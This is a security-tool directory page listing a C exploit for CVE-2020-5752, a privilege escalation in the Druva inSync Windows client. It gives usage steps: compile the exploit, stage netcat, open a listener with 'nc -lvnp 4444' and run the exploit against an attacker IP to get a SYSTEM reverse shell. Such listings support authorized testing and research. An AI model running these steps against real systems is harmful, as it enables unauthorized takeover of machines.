Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-5752 — Local Priviledge Escalation for Druva | Kitploit
Tools/GitHubGitHub/x0rbeexd/cve-2020-5752
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubx0rbeexd/cve-2020-5752

CVE-2020-5752

Local Priviledge Escalation for Druva

View Repository
118 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-5752: Druva inSync Local Privilege Escalation

A C-based exploit for the Druva inSync Windows Client (v6.6.3 and below). The application exposes an RPC service on port 6064 that is vulnerable to command injection via path traversal. This allows a local user to execute arbitrary commands as NT AUTHORITY\SYSTEM.

Vulnerability Details

  • CVE: 2020-5752
  • Tested on: Windows 10 (x64)
  • Privilege Level: Local Privilege Escalation (LPE)

Usage

1. Compilation

Use gcc (MinGW) to compile the source code:

root@kitploit:~
gcc exploit.c -o exploit.exe -lws2_32

2. Preparation

Place a copy of nc.exe in a directory accessible by the SYSTEM account (e.g., C:\Windows\Tasks).

3. Execution

Start a listener on your attacker machine:

root@kitploit:~

nc -lvnp 4444
Run the exploit on the target Windows machine:
root@kitploit:~
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe

Disclaimer

This tool is for educational purposes only. Unauthorized use on systems you do not have permission to test is illegal

Download Tool